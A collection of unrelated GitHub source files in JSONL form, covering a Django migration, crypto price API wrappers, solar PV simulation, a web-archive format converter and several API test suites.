logging.basicConfig(level=logging.DEBUG)\n\n unittest.main()\n\n","repo_name":"gooofy/py-espeak-ng","sub_path":"tests/test_espeakng.py","file_name":"test_espeakng.py","file_ext":"py","file_size_in_byte":2938,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"66"} +{"seq_id":"192425455","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n (\"profiles\", \"0001_initial\"),\n ]\n\n operations = [\n migrations.AddField(\n model_name=\"profile\",\n name=\"avatar\",\n field=models.ImageField(upload_to=\"profiles\", blank=True, null=True),\n preserve_default=True,\n ),\n ]\n","repo_name":"tutuca/potaje","sub_path":"profiles/migrations/0002_profile_avatar.py","file_name":"0002_profile_avatar.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"2301065265","text":"import requests\nimport sys\n\nurl = \"http://localhost:5000/get_translation\"\n\nSENTENCE_TO_TRANSLATE = sys.argv[1]\n\npayload=\"{\\n \\\"sentence\\\": \\\"%s\\\"\\n}\" % SENTENCE_TO_TRANSLATE\nheaders = {\n 'Content-Type': 'application/json'\n}\n\nresponse = requests.request(\"POST\", url, headers=headers, data=payload)\n\nprint(response.text)\n","repo_name":"tgdev24/dockerSample","sub_path":"client_script.py","file_name":"client_script.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"43515862748","text":"import json\nimport requests\n\nclass CryptoApi(object):\n\n def __init__(self):\n self._api_url = 'https://api.coingecko.com/api/v3/coins/{0}?localization=false&tickers=false&community_data=false&developer_data=false&sparkline=false%22'\n self._coindesk_api_url = 'https://api.coindesk.com/v1/bpi/historical/close.json?start={0}&end={1}'\n\n def get_crypto_price(self, name_crypto, name_currency):\n url = self._api_url.format(name_crypto)\n \n try:\n response = requests.get(url)\n response.raise_for_status()\n data = json.loads(response.text)\n price = data['market_data']['current_price'][name_currency]\n\n return f'1 {name_crypto} = {price} {name_currency}'\n\n except requests.HTTPError:\n return f'Sorry, that cryptocurrency doesn\\'t exist or i dont have info about it :('\n\n except KeyError:\n return f'Sorry, i didn\\'t foud {name_crypto}\\'s price in {name_currency} :('\n\n def convert_to_crypto(self, name_currency, name_crypto, amount):\n url = self._api_url.format(name_crypto)\n \n try:\n response = requests.get(url)\n response.raise_for_status()\n data = json.loads(response.text)\n price = data['market_data']['current_price'][name_currency]\n converted_value = (amount/price)\n \n return f'{amount} {name_currency} = {converted_value} {name_crypto}'\n \n except requests.HTTPError:\n return f'Sorry, that cryptocurrency doesn\\'t exist or i dont have info about it :('\n\n except KeyError:\n return f'Sorry, i coudn\\'t convert {name_currency} to {name_crypto}. Try with another currency :('\n\n def convert_from_crypto(self, name_crypto, name_currency, amount):\n url = self._api_url.format(name_crypto)\n \n try:\n response = requests.get(url)\n response.raise_for_status()\n data = json.loads(response.text)\n price = data['market_data']['current_price'][name_currency]\n converted_value = (amount * price)\n \n return f'{amount} {name_crypto} = {converted_value} {name_currency}'\n \n except requests.HTTPError:\n return f'Sorry, that cryptocurrency doesn\\'t exist or i dont have info about it :('\n\n except KeyError:\n return f'Sorry, i coudn\\'t convert {name_crypto} to {name_currency}. Try with another currency :('\n\n def get_historical_price(self, date):\n url = self._coindesk_api_url.format(date, date)\n\n try:\n response = requests.get(url)\n response.raise_for_status()\n data = json.loads(response.text)\n price = data['bpi'][date]\n disclaimer = data['disclaimer']\n \n return f'Bitcoin price on {date} = {price} usd \\n{disclaimer}'\n\n except requests.HTTPError:\n return f'Sorry, i couldn\\'t find Bitcoin price on that date.'\n\n\n","repo_name":"Sgewux/discord_bot","sub_path":"cogs/bot_utilities/crypto_api.py","file_name":"crypto_api.py","file_ext":"py","file_size_in_byte":3015,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"36817733096","text":"import numpy as np\nimport pandas as pd\n\nfrom .Alternative import Alternative\nfrom .Category import Category\nfrom .Criterion import Criterion\nfrom .CriterionTri import CriterionTri\nfrom .ImpactMatrix import ImpactMatrix\nfrom .ImpactMatrixTri import ImpactMatrixTri\nfrom .Profile import Profile\nfrom .ProfileMatrix import ProfileMatrix\n\n\ndef create_impact_matrix_from_csv(filename_matrix,\n filename_criterion_data,\n filename_matrix_index_col: str = 'A',\n filename_criterion_data_index_col: str = 'I'):\n matrix = pd.read_csv(filename_matrix, index_col=filename_matrix_index_col)\n cri_information = pd.read_csv(filename_criterion_data, index_col=filename_criterion_data_index_col)\n\n raw_data = matrix.to_numpy()\n\n alt_names = matrix.index.values\n alternatives = [Alternative(a) for a in alt_names]\n criterions = [create_criterion(col, cri_information[col]) for col in matrix.columns]\n\n impact_matrix = ImpactMatrix(np.array(alternatives),\n np.array(criterions),\n raw_data)\n\n return impact_matrix\n\n\ndef create_tri_data(filename_matrix,\n filename_criterion_data,\n filename_b_data,\n filename_q_data,\n filename_p_data,\n filename_v_data,\n filename_matrix_index_col: str = 'A',\n filename_criterion_data_index_col: str = 'I',\n filename_b_data_col: str = 'C'):\n p = pd.read_csv(filename_p_data)\n q = pd.read_csv(filename_q_data)\n v = pd.read_csv(filename_v_data)\n matrix = pd.read_csv(filename_matrix, index_col=filename_matrix_index_col)\n cri_information = pd.read_csv(filename_criterion_data, index_col=filename_criterion_data_index_col)\n b = pd.read_csv(filename_b_data, index_col=filename_b_data_col)\n\n raw_data = matrix.to_numpy()\n\n alt_names = matrix.index.values\n alternatives = [Alternative(a) for a in alt_names]\n criterions = [create_tri_criterion(col,\n cri_information[col],\n q[col].values[0],\n p[col].values[0],\n v[col].values[0]) for col in b.index.values]\n\n impact_matrix = ImpactMatrixTri(alternatives, criterions, raw_data)\n\n raw_data_b = b.to_numpy()\n\n pro_names = b.columns\n profiles = [Profile(p) for p in pro_names]\n categories = [Category(pro_names[i].split('-')[0])\n if i < len(pro_names) else Category(pro_names[i - 1].split('-')[1])\n for i in range(len(pro_names) + 1)]\n\n criterions = [create_tri_criterion(col,\n cri_information[col],\n q[col].values[0],\n p[col].values[0],\n v[col].values[0]) for col in b.index.values]\n\n profile_matrix = ProfileMatrix(profiles, criterions, categories, raw_data_b)\n\n return impact_matrix, profile_matrix\n\n\ndef create_tri_criterion(name, cri_info, q, p, v):\n ascending = eval(str(cri_info[\"ascending\"]))\n criterion_type = cri_info[\"criterion_type\"]\n cri = CriterionTri(name, q, p, v, ascending, criterion_type)\n return cri\n\n\ndef create_criterion(name, cri_info):\n ascending = eval(str(cri_info[\"ascending\"]))\n criterion_type = cri_info[\"criterion_type\"]\n cri = Criterion(name, ascending, criterion_type)\n return cri\n","repo_name":"Z-Rna/psmaa-app","sub_path":"services/backend/psmaa/data_utils.py","file_name":"data_utils.py","file_ext":"py","file_size_in_byte":3615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"22916598498","text":"# -*- encoding: utf-8 -*-\n'''\n Datafile import template for the CCMS system.\n'''\n## General settings for the file\ngeneral={\n\t 'name': 'CCMS',\n ## A list of leading characters which will not be used for data lines.\n 'comments': ['#'],\n 'split string': None, \n 'sample': '', \n 'short info': '', \n }\n## Defining the file header\nheader={\n 'length': 1, \n }\n## Defining the data columns\ncolumns={\n 'from header': (0, None, None, None),\n 'header column splitting': (\"\", '_(', \")'\"), \n ## Define columns to use for x,y,z and error column.\n 'plot columns': {\n 'x': [],#'T_sample'], \n 'y': ['moment'], \n #'z': [], \n 'error': []\n }, \n }\n## Defining sequence splitting\nsplitting={\n 'use empty': True, \n }\n## Defining the file footer, if nothing is specified there will be no footer\nfooter={\n }\n## Define how the applicability of thes template can be checked\ntype_info={\n 'wildcards': ['*.dat'],\n # Not jet implemented\n }\n\n#------------------------------------ End of Template settings -----------------------------------","repo_name":"aglavic/plotpy","sub_path":"plot_script/config/default_templates/ccms.py","file_name":"ccms.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"17507016716","text":"import argparse\nimport logging\nimport os\nimport os.path\nimport datetime\nimport rsgislib\n\nimport eodatadown.eodatadownrun\n\nfrom eodatadown import EODATADOWN_SENSORS_LIST\n\nlogger = logging.getLogger('eoddcreatereport.py')\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-c\", \"--config\", type=str, default=\"\", help=\"Path to the JSON config file.\")\n parser.add_argument(\"-o\", \"--output\", type=str, required=True, help=\"The output PDF report file.\")\n parser.add_argument(\"--start\", type=str, required=True, help=\"The start date (recent), with format YYYYMMDD.\")\n parser.add_argument(\"--end\", type=str, required=True, help=\"The start date (earliest), with format YYYYMMDD.\")\n parser.add_argument(\"-s\", \"--sensor\", type=str, required=False, choices=EODATADOWN_SENSORS_LIST,\n help='''Specify the sensor for which this process should be executed (Optional)''')\n parser.add_argument(\"-p\", \"--platform\", type=str, required=False,\n help='''Specify the platform for which this process should be executed (Optional)''')\n parser.add_argument(\"--order_desc\", action='store_true', default=False,\n help=\"Specify that the scenes should be in descending order.\")\n parser.add_argument(\"--record_db\", action='store_true', default=False,\n help=\"Specify that the report should be stored in database.\")\n\n args = parser.parse_args()\n\n config_file = args.config\n main_config_value = os.getenv('EDD_MAIN_CFG', None)\n if (config_file == '') and (main_config_value is not None):\n config_file = main_config_value\n\n print(\"'\" + config_file + \"'\")\n\n if not os.path.exists(config_file):\n logger.info(\"The config file does not exist: '\" + config_file + \"'\")\n raise Exception(\"Config file does not exist\")\n\n t = rsgislib.RSGISTime()\n t.start(True)\n\n start_date = datetime.datetime.strptime(args.start, '%Y%m%d').date()\n end_date = datetime.datetime.strptime(args.end, '%Y%m%d').date()\n\n eodatadown.eodatadownrun.create_date_report(config_file, args.output, start_date, end_date, args.sensor,\n args.platform, args.order_desc, args.record_db)\n\n t.end(reportDiff=True, preceedStr='EODataDown processing completed ', postStr=' - eoddcreatereport.py.')\n\n","repo_name":"remotesensinginfo/eodatadown","sub_path":"bin/eoddcreatereport.py","file_name":"eoddcreatereport.py","file_ext":"py","file_size_in_byte":2373,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"66"} +{"seq_id":"6749243889","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Nov 29 17:47:46 2017\n\n@author: Gerrit\n\"\"\"\n\nimport numpy as np\nimport site #import additional module for SAM simulation\nsite.addsitedir('S:\\Gerrits_Documents\\Renewable Profile Creation\\PV\\sdk-release\\languages\\python') # Use site.addsitedir() to set the path to the SAM SDK API. Set path to the python directory.\nimport sscapi # can only import this after directory is added to site module on where to find it\n\nclass PVSystem:\n \"\"\"\n Class that holds NREL Software Simulation Core objects and data containers\n Uses SAM's Software Development Kit (SDK)\n Allows you to run PVWatts in python\n \"\"\"\n def __init__(self,\n weather_dataframe, # weather data from NSRDB (pd.DataFrame)\n weather_meta_data, # meta data for the weather data file above (pd.DataFrame)\n system_capacity_dc = 1, # DC system capacity (kW or MW)\n dc_ac_ratio = 1.1, # Set DC/AC ratio (or inverter loading ratio). See https://sam.nrel.gov/sites/default/files/content/virtual_conf_july_2013/07-sam-virtual-conference-2013-woodcock.pdf\n tilt = 0, # tilt of system in degrees (0 = horizontal)\n azimuth = 180, # azimuth angle (in degrees) from north (180 = south facing)\n inv_eff = 96, # inverter efficiency in percent\n losses = 14.0757, # system losses in percent (soiling, shading, wiring, etc.)\n array_type = 0, # specify fixed tilt system (0=Fixed, 1=Fixed Roof, 2=1 Axis Tracker, 3=Backtracted, 4=2 Axis Tracker)\n gcr = 0.4, # ground coverage ratio\n adjust_constant = 0 # constant loss adjustment\n ):\n \n # Set up Software Simulation Core (SSC) Object\n ssc = sscapi.PySSC()\n\n # Set Up Data Containers\n dat = ssc.data_create() # container for all input data\n wfd = ssc.data_create() # weather file data container\n \n # Fill wfd container with weather data\n ssc.data_set_number(wfd, 'lat', weather_meta_data['Latitude'])\n ssc.data_set_number(wfd, 'lon', weather_meta_data['Longitude'])\n ssc.data_set_number(wfd, 'tz', weather_meta_data['Local Time Zone'])\n ssc.data_set_number(wfd, 'elev', weather_meta_data['Elevation'])\n ssc.data_set_array(wfd, 'year', weather_dataframe.index.year)\n ssc.data_set_array(wfd, 'month', weather_dataframe.index.month)\n ssc.data_set_array(wfd, 'day', weather_dataframe.index.day)\n ssc.data_set_array(wfd, 'hour', weather_dataframe.index.hour)\n ssc.data_set_array(wfd, 'minute', weather_dataframe.index.minute)\n ssc.data_set_array(wfd, 'dn', weather_dataframe['DNI'])\n ssc.data_set_array(wfd, 'df', weather_dataframe['DHI'])\n ssc.data_set_array(wfd, 'wspd', weather_dataframe['Wind Speed'])\n ssc.data_set_array(wfd, 'tdry', weather_dataframe['Temperature'])\n\n # Add wfd container to dat container\n ssc.data_set_table(dat, 'solar_resource_data', wfd)\n ssc.data_free(wfd)\n\n # Specify the system Configuration\n ssc.data_set_number(dat, 'system_capacity', system_capacity_dc)\n ssc.data_set_number(dat, 'dc_ac_ratio', dc_ac_ratio)\n ssc.data_set_number(dat, 'tilt', tilt)\n ssc.data_set_number(dat, 'azimuth', azimuth)\n ssc.data_set_number(dat, 'inv_eff', inv_eff)\n ssc.data_set_number(dat, 'losses', losses)\n ssc.data_set_number(dat, 'array_type', array_type)\n ssc.data_set_number(dat, 'gcr', gcr)\n ssc.data_set_number(dat, 'adjust:constant', adjust_constant)\n \n # Add the software simulation core object and the input data object as attributes to the PVSystem object\n self.ssc = ssc\n self.dat = dat\n\n def simulate(self):\n \"\"\"\n Simulate PV generation for defined system\n Returns:\n output (np.array): Array of hourly generation in MW (ac)\n \"\"\"\n \n # Create PVWatts module, execute, and save results in dataframe\n mod = self.ssc.module_create('pvwattsv5') # create a pvwatts module (pvwattsv5 is the current version of the module)\n self.ssc.module_exec(mod, self.dat)\n \n return np.array(self.ssc.data_get_array(self.dat, 'gen'))","repo_name":"abdesslemn/Solar_Wind_Shapes","sub_path":"PV/pvsim_sam.py","file_name":"pvsim_sam.py","file_ext":"py","file_size_in_byte":4311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"71417400530","text":"import html\nimport os\nimport shutil\nimport time\nimport traceback\nfrom datetime import datetime, timezone\nfrom email.utils import format_datetime\nfrom urllib.parse import quote\n\nfrom ... import util\nfrom ..._polyfill import zipfile\nfrom ...util import Info\nfrom ..host import Host\nfrom ..indexer import FavIconCacher, SingleHtmlConverter, UnSingleHtmlConverter\n\n\nclass Converter:\n def __init__(self, input, output, book_items=None, types=None, format=None):\n self.input = input\n self.output = output\n self.book_items = book_items\n self.types = set(types) if types else {}\n self.format = format\n\n def run(self):\n if self.input != self.output:\n yield Info('info', 'Copying files...')\n os.makedirs(self.output, exist_ok=True)\n self._copy_files()\n\n yield Info('info', 'Applying conversion...')\n host = Host(self.output)\n\n for book_id, item_ids in (self.book_items or dict.fromkeys(host.books)).items():\n try:\n book = host.books[book_id]\n except KeyError:\n # skip invalid book ID\n yield Info('warn', f'Skipped invalid book {book_id!r}.')\n continue\n\n yield Info('info', f'Handling book {book_id!r}...')\n book.load_meta_files()\n\n book_meta_orig = book.checksum(book.meta)\n\n for id in (item_ids or book.meta):\n if id not in book.meta:\n # skip invalid item ID\n yield Info('debug', f'Skipped invalid item {id!r}.')\n continue\n\n type = book.meta[id].get('type', '')\n if type not in self.types:\n yield Info('debug', f'Skipped item {id!r}: type={type!r}')\n continue\n\n yield Info('debug', f'Checking {id!r}...')\n\n if self.format:\n try:\n try:\n yield from self._convert_item_format(book, id)\n except OSError as exc:\n raise RuntimeError(exc.strerror) from exc\n except Exception as exc:\n traceback.print_exc()\n yield Info('error', f'Failed to convert {id!r}: {exc}', exc=exc)\n\n # update files\n if book.checksum(book.meta) != book_meta_orig:\n yield Info('info', 'Saving changed meta files...')\n book.save_meta_files()\n\n def _copy_files(self):\n with os.scandir(self.input) as dirs:\n for src in dirs:\n dst = os.path.join(self.output, src.name)\n try:\n shutil.copytree(src, dst)\n except NotADirectoryError:\n shutil.copy2(src, dst)\n\n def _convert_item_format(self, book, id):\n meta = book.meta[id]\n index = meta.get('index')\n\n if not index:\n yield Info('debug', f'Skipped {id!r}: no index')\n return\n\n if index.endswith('/index.html'):\n format = 'folder'\n elif util.is_htz(index):\n format = 'htz'\n elif util.is_maff(index):\n format = 'maff'\n else:\n format = 'single_file'\n\n if format == self.format:\n yield Info('debug', f'Skipped {id!r}: same format')\n return\n\n if format == 'folder':\n indexbase = index[:-11]\n fsrc = os.path.normpath(os.path.join(book.data_dir, indexbase))\n indexdir = os.path.normpath(os.path.join(book.data_dir, indexbase + '.' + util.datetime_to_id()))\n shutil.copytree(fsrc, indexdir)\n yield from self._cache_favicon(book, id)\n elif format == 'htz':\n fsrc = os.path.normpath(os.path.join(book.data_dir, index))\n indexbase = index[:-4]\n indexdir = os.path.normpath(os.path.join(book.data_dir, indexbase + '.' + util.datetime_to_id()))\n util.fs.zip_extract(fsrc, indexdir)\n elif format == 'maff':\n fsrc = os.path.normpath(os.path.join(book.data_dir, index))\n indexbase = index[:-5]\n indexdir = os.path.normpath(os.path.join(book.data_dir, indexbase + '.' + util.datetime_to_id()))\n\n maff_info = next(iter(util.get_maff_pages(fsrc)), None)\n if not maff_info:\n yield Info('debug', f'Skipping {id!r}: no valid index page in MAFF')\n subpath, _, _ = maff_info.indexfilename.partition('/')\n\n util.fs.zip_extract(fsrc, indexdir, subpath)\n\n rdf_file = os.path.join(indexdir, 'index.rdf')\n try:\n os.remove(rdf_file)\n except FileNotFoundError:\n pass\n else:\n fsrc = os.path.normpath(os.path.join(book.data_dir, index))\n indexbase, ext = os.path.splitext(index)\n indexdir = os.path.normpath(os.path.join(book.data_dir, indexbase + '.' + util.datetime_to_id()))\n\n os.makedirs(indexdir)\n indexfile = os.path.join(indexdir, 'index.html')\n if util.is_html(fsrc) and not util.is_xhtml(fsrc):\n mainfile = indexfile\n shutil.copy2(fsrc, mainfile)\n else:\n basename = os.path.basename(index)\n mainfile = os.path.join(indexdir, basename)\n shutil.copy2(fsrc, mainfile)\n with open(indexfile, 'w', encoding='UTF-8', newline='\\n') as fh:\n fh.write(f'')\n\n if util.is_html(mainfile) or util.is_svg(mainfile):\n conv = UnSingleHtmlConverter(mainfile)\n content = conv.run()\n with open(mainfile, 'w', encoding=conv.encoding, newline='') as fh:\n fh.write(content)\n\n shutil.copystat(fsrc, indexfile)\n\n try:\n if self.format == 'folder':\n fdst = os.path.normpath(os.path.join(book.data_dir, indexbase))\n yield Info('info', f'Converting {id!r}: {book.get_subpath(fsrc)!r} => {book.get_subpath(fdst)!r} ...')\n\n if os.path.lexists(fdst):\n yield Info('error', f'Failed to convert {id!r}: target {book.get_subpath(fdst)!r} already exists.')\n return\n\n shutil.move(indexdir, fdst)\n\n # adjust icon path to fit the new index file\n iconfile = book.get_icon_file(meta)\n if iconfile:\n meta['icon'] = util.get_relative_url(iconfile, fdst, path_is_dir=False, start_is_dir=True)\n\n meta['index'] = indexbase + '/index.html'\n\n elif self.format == 'htz':\n fdst = os.path.normpath(os.path.join(book.data_dir, indexbase + '.htz'))\n yield Info('info', f'Converting {id!r}: {book.get_subpath(fsrc)!r} => {book.get_subpath(fdst)!r} ...')\n\n if os.path.lexists(fdst):\n yield Info('error', f'Failed to convert {id!r}: target {book.get_subpath(fdst)!r} already exists.')\n return\n\n util.fs.zip_compress(fdst, indexdir, '')\n shutil.copystat(os.path.join(indexdir, 'index.html'), fdst)\n\n # adjust icon path to fit the new index file\n iconfile = book.get_icon_file(meta)\n if iconfile:\n meta['icon'] = util.get_relative_url(iconfile, fdst, path_is_dir=False, start_is_dir=False)\n\n meta['index'] = indexbase + '.htz'\n\n elif self.format == 'maff':\n fdst = os.path.normpath(os.path.join(book.data_dir, indexbase + '.maff'))\n yield Info('info', f'Converting {id!r}: {book.get_subpath(fsrc)!r} => {book.get_subpath(fdst)!r} ...')\n\n rdf_file = os.path.join(indexdir, 'index.rdf')\n if os.path.lexists(rdf_file):\n yield Info('error', f'Failed to convert {id!r}: index.rdf file already exists.')\n return\n\n if os.path.lexists(fdst):\n yield Info('error', f'Failed to convert {id!r}: target {book.get_subpath(fdst)!r} already exists.')\n return\n\n subpath = id if util.id_to_datetime(id) else util.datetime_to_id()\n util.fs.zip_compress(fdst, indexdir, subpath)\n\n rdf_content = self._generate_index_rdf(book, id)\n with zipfile.ZipFile(fdst, 'a') as zh:\n zh.writestr(\n f'{subpath}/index.rdf', rdf_content,\n **util.fs.zip_compression_params(mimetype='application/rdf+xml')\n )\n\n shutil.copystat(os.path.join(indexdir, 'index.html'), fdst)\n\n # adjust icon path to fit the new index file\n iconfile = book.get_icon_file(meta)\n if iconfile:\n meta['icon'] = util.get_relative_url(iconfile, fdst, path_is_dir=False, start_is_dir=False)\n\n meta['index'] = indexbase + '.maff'\n\n elif self.format == 'single_file':\n file = os.path.join(indexdir, 'index.html')\n file = util.get_meta_refreshed_file(file) or file\n\n if util.is_xhtml(file):\n ext = '.xhtml'\n elif util.is_html(file):\n ext = '.html'\n elif util.is_svg(file):\n ext = '.svg'\n else:\n _, ext = os.path.splitext(file)\n\n # special handling to prevent named \"index.html\"\n if indexbase == 'index' and ext == '.html':\n indexbase = 'index_'\n\n fdst = os.path.normpath(os.path.join(book.data_dir, indexbase + ext))\n yield Info('info', f'Converting {id!r}: {book.get_subpath(fsrc)!r} => {book.get_subpath(fdst)!r} ...')\n\n if os.path.lexists(fdst):\n yield Info('error', f'Failed to convert {id!r}: target {book.get_subpath(fdst)!r} already exists.')\n return\n\n if util.is_html(file) or util.is_svg(file):\n conv = SingleHtmlConverter(file)\n content = conv.run()\n with open(fdst, 'w', encoding=conv.encoding, newline='') as fh:\n fh.write(content)\n shutil.copystat(file, fdst)\n else:\n shutil.copy2(file, fdst)\n\n if meta.get('icon'):\n iconfile = book.get_icon_file(meta)\n meta['icon'] = util.get_relative_url(iconfile, fdst, path_is_dir=False, start_is_dir=False)\n meta['index'] = indexbase + ext\n\n try:\n shutil.rmtree(fsrc)\n except NotADirectoryError:\n os.remove(fsrc)\n finally:\n try:\n shutil.rmtree(indexdir)\n except FileNotFoundError:\n pass\n\n def _cache_favicon(self, book, id):\n generator = FavIconCacher(book, cache_archive=True, cache_file=True)\n yield from generator.run([id])\n\n def _generate_index_rdf(self, book, id):\n meta = book.meta[id]\n dt = util.id_to_datetime(meta.get('create', ''))\n dt = dt.astimezone() if dt else datetime.now(timezone.utc)\n return f\"\"\"\\\n\n\n\n \n \n \n \n \n\n\n\"\"\"\n\n\ndef run(input, output, book_items=None, types=None, format=None):\n start = time.time()\n yield Info('info', 'converting items:')\n yield Info('info', f'input directory: {os.path.abspath(input)}')\n yield Info('info', f'output directory: {os.path.abspath(output) if output is not None else \"(in-place)\"}')\n\n if book_items:\n for book_id, item_ids in book_items.items():\n item_ids_text = ', '.join(f'{id!r}' for id in item_ids) if item_ids else 'all'\n yield Info('info', f'book: {book_id!r}, item(s): {item_ids_text}')\n else:\n yield Info('info', 'books: all, items: all')\n\n yield Info('info', f'types: {types}')\n yield Info('info', f'format: {format}')\n yield Info('info', '')\n\n if output is None:\n output = input\n\n try:\n conv = Converter(input, output, book_items=book_items, types=types, format=format)\n yield from conv.run()\n except Exception as exc:\n traceback.print_exc()\n yield Info('critical', str(exc), exc=exc)\n return\n else:\n yield Info('info', 'Done.')\n\n elapsed = time.time() - start\n yield Info('info', f'Time spent: {elapsed} seconds.')\n","repo_name":"danny0838/PyWebScrapBook","sub_path":"webscrapbook/scrapbook/convert/items.py","file_name":"items.py","file_ext":"py","file_size_in_byte":13306,"program_lang":"python","lang":"en","doc_type":"code","stars":65,"dataset":"github-code","pt":"66"} +{"seq_id":"33608051992","text":"import pytest\n\nfrom tests_cargo_corp import utils\n\n\n@pytest.mark.parametrize(\n 'is_robot_active, cargo_robots_code, expected_code',\n ((True, 200, 200), (True, 404, 404), (False, 200, 404)),\n)\nasync def test_robot_token_info(\n pgsql,\n taxi_cargo_corp,\n mockserver,\n is_robot_active,\n cargo_robots_code,\n expected_code,\n):\n external_ref = utils.EXTERNAL_REF_FMT.format(utils.CORP_CLIENT_ID)\n\n @mockserver.json_handler('cargo-robots/v1/robot/token')\n def _handler(request):\n assert request.query['external_ref'] == external_ref\n if cargo_robots_code == 200:\n return {'token': utils.ROBOT_TOKEN}\n return mockserver.make_response(\n status=cargo_robots_code, json=utils.BAD_RESPONSE,\n )\n\n if is_robot_active:\n utils.create_employee(\n pgsql, corp_client_id=utils.CORP_CLIENT_ID, is_robot=True,\n )\n response = await taxi_cargo_corp.post(\n 'v1/client/robot/token/info',\n headers={\n 'X-B2B-Client-Id': utils.CORP_CLIENT_ID,\n 'X-Yandex-Uid': utils.YANDEX_UID,\n },\n )\n assert response.status_code == expected_code\n if expected_code == 200:\n assert response.json() == {\n 'token': utils.ROBOT_TOKEN,\n 'revision': 1,\n 'is_enabled': is_robot_active,\n }\n\n\n@pytest.mark.parametrize(\n 'is_robot_exist, is_robot_enabled, expected_code',\n ((True, True, 200), (True, False, 200), (False, False, 404)),\n)\nasync def test_robot_token_edit(\n pgsql,\n taxi_cargo_corp,\n is_robot_exist,\n is_robot_enabled,\n expected_code,\n):\n if is_robot_exist:\n utils.create_employee(\n pgsql,\n corp_client_id=utils.CORP_CLIENT_ID,\n is_disabled=is_robot_enabled,\n is_robot=True,\n )\n\n for _ in range(2):\n body = {'revision': 1, 'is_enabled': is_robot_enabled}\n response = await taxi_cargo_corp.post(\n 'v1/client/robot/token/edit',\n headers={\n 'X-B2B-Client-Id': utils.CORP_CLIENT_ID,\n 'X-Yandex-Uid': utils.YANDEX_UID,\n },\n json=body,\n )\n assert response.status_code == expected_code\n if expected_code == 200:\n assert response.json() == {\n 'revision': 2,\n 'is_enabled': is_robot_enabled,\n }\n","repo_name":"Alexander-Berg/2022-tests-examples-2","sub_path":"Taxi/tests_cargo_corp/test_robot_token.py","file_name":"test_robot_token.py","file_ext":"py","file_size_in_byte":2447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"72686525969","text":"import time\n\nimport pytest\nfrom fastapi.testclient import TestClient\n\n\nclass TestBlog:\n USER = {\n \"username\": f\"testuser{int(time.time())}\",\n \"password\": \"testpassword\"\n }\n USER_EMPLOYEE = {\n \"username\": f\"testuser_employee{int(time.time())}\",\n \"password\": \"testpassword_employee\"\n }\n\n def get_auth_client(self, client: TestClient) -> TestClient:\n response = client.post(\"/auth/login/\", json=self.USER)\n access_token = response.json()[\"access_token\"]\n return TestClient(\n client.app, headers={\"Authorization\": f\"Bearer {access_token}\"}\n )\n\n def get_auth_client_employee(self, client: TestClient) -> TestClient:\n response = client.post(\"/auth/login/\", json=self.USER_EMPLOYEE)\n access_token = response.json()[\"access_token\"]\n return TestClient(\n client.app, headers={\"Authorization\": f\"Bearer {access_token}\"}\n )\n\n def test_register(self, client: TestClient, session):\n for user in [self.USER, self.USER_EMPLOYEE]:\n response = client.post(\"/auth/register/\", json=user)\n assert response.status_code == 201\n assert response.json()[\"username\"] == user.get(\"username\")\n\n def test_login(self, client: TestClient) -> TestClient:\n response = client.post(\"/auth/login/\", json=self.USER_EMPLOYEE)\n assert response.status_code == 200\n assert \"access_token\" in response.json()\n assert response.json()[\"token_type\"] == \"Bearer\"\n\n def test_get_staff(self, client: TestClient, session):\n code = {\"code\": \"надо\"}\n response = self.get_auth_client(client).patch(\n \"/auth/users/get-staff-status/\", json=code\n )\n assert response.status_code == 200\n assert response.json()[\"Status Staff\"] is True\n\n @pytest.mark.parametrize(\"skip, limit\", [(0, 20), (0, 1)])\n def test_read_users(self, client: TestClient, session, skip, limit):\n response = self.get_auth_client(client).get(\n f\"/auth/users/?skip={skip}&limit={limit}\"\n )\n assert response.status_code == 200\n users = response.json()\n assert len(users) <= limit\n\n def test_read_user(self, client: TestClient, session):\n response = self.get_auth_client(client).get(\"/auth/users/me/\")\n assert response.status_code == 200\n response = client.get(\"/auth/users/me/\")\n assert response.status_code == 401\n\n def test_set_rate(self, client: TestClient, session):\n salary = {\n \"employee_id\": 2,\n \"current_rate\": 50000,\n \"rate_increase_period\": 90\n }\n response = self.get_auth_client(client).post(\n \"/salary/set-rate/\", json=salary\n )\n assert response.status_code == 201\n assert float(response.json()['current_rate'])\n assert response.json()['current_rate'] == 50000.0\n assert response.json()['employee_id'] == 2\n\n response = client.post(\n \"/salary/set-rate/\", json=salary\n )\n assert response.status_code == 401\n\n def test_next_pay_raise(self, client: TestClient, session):\n response = self.get_auth_client_employee(client).get(\n \"/next-pay-raise\"\n )\n assert response.status_code == 404\n","repo_name":"exp-ext/current_paychecks","sub_path":"backend/tests/test_ruoters.py","file_name":"test_ruoters.py","file_ext":"py","file_size_in_byte":3305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"16913742449","text":"\n# CTRL+K then CTRL+C adds the # in VS for selected lines. CTRL+K then CTRL+U removes the # in VS for selected lines.\n\n# sys.path is a built-in variable within the sys module. It contains a list of directories that the interpreter will search in for the required module. \n\n#When a module(a module is a python file) is imported within a Python file,\n#the interpreter first searches for the specified module among its built-in modules.\n#If not found it looks through the list of directories(a directory is a folder that contains related modules) defined by sys.path.\n#first string returned by path is always empty this is to indicate the interpreter to check in the current directory.\n\n# from src.utils.common_utils import read_config\n# from src.utils.data_management import get_data\n# from src.utils.model import create_model, save_model ,save_plot\n# from 